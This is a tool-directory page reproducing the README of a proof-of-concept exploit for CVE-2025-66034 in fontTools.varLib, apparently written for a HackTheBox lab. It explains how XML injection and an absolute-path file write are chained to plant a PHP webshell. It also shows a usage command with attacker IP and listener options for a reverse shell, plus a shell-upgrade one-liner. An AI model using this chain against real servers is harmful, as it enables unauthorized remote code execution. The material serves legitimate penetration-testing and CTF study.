Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-66034 — CVE-2025-66034 - fontTools varLib Arbitrary File Write → RCE PoC exploit for an Arbitrary File Write + XML Injection vulnerability in fontTools.varLib. | Kitploit
Tools/GitHubGitHub/4nuxd/cve-2025-66034
Vulnerability AnalysisExploitationWeb Application ExploitationCTFPenetration TestingPayload Development
GitHub4nuxd/cve-2025-66034

CVE-2025-66034

CVE-2025-66034 - fontTools varLib Arbitrary File Write → RCE PoC exploit for an Arbitrary File Write + XML Injection vulnerability in fontTools.varLib.

View Repository
86 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-66034 — fontTools varLib Arbitrary File Write → RCE

PoC exploit for an Arbitrary File Write + XML Injection vulnerability in fontTools.varLib Tested on HackTheBox — VarIaType


Vulnerability

fontTools.varLib processes .designspace XML files to build variable fonts. Two weaknesses combine to achieve pre-auth RCE:

#PrimitiveDetail
1XML Injection via CDATA splitAttacker-controlled content inside <labelname> is written verbatim into the output font file body, allowing arbitrary data injection
2Arbitrary File Write via os.path.join() bypassThe filename attribute of <variable-font> accepts an absolute path. When passed to os.path.join(), it discards the intended output directory and writes to any attacker-specified filesystem path

Chaining both primitives allows writing a PHP webshell to a web-accessible path, achieving unauthenticated Remote Code Execution.


Usage

python3 font_varlib.py \
  --ip <attacker-ip> \
  --port <port> \
  --upload http://target.htb/tools/variable-font-generator/process \
  --webroot /var/www/portal.target.htb/public/files \
  --shell http://portal.target.htb/files

Options

FlagDescription
--ipAttacker IP for the reverse shell callback
--portListener port
--uploadFull URL of the font processing endpoint (POST)
--webrootServer-side absolute path that maps to a web-accessible directory
--shellBase URL under which the webshell will be accessible
--no-listenSkip auto-listener — print manual commands instead
--pwncatUse pwncat-cs instead of nc (preferred if available)

Dependencies

pip install requests fonttools

How It Works

  1. Master fonts — Two minimal .ttf files (source-light.ttf, source-regular.ttf) are generated using fontTools.FontBuilder as required masters for the designspace
  2. Malicious .designspace — A crafted XML file is built with:
    • PHP webshell injected via a CDATA split inside <labelname>
    • Absolute write path set as the filename of <variable-font>, bypassing output_dir via os.path.join()
  3. Upload — The .designspace + master fonts are POSTed to the processing endpoint
  4. Trigger — The planted .php file is requested, executing the reverse shell payload
  5. TTY upgrade — On connection, the script automatically spawns a PTY via python3 -c 'import pty; pty.spawn("/bin/bash")' and sets TERM + stty for a fully interactive shell

Disclosure

Field
CVECVE-2025-66034
Affected componentfontTools.varLib
ImpactUnauthenticated Arbitrary File Write → Remote Code Execution
ContextWeb application exposing font processing endpoint

Legal

This tool is intended for authorized penetration testing and CTF use only. Do not run against systems you do not own or have explicit written permission to test.


by 4nuxd

Download Tool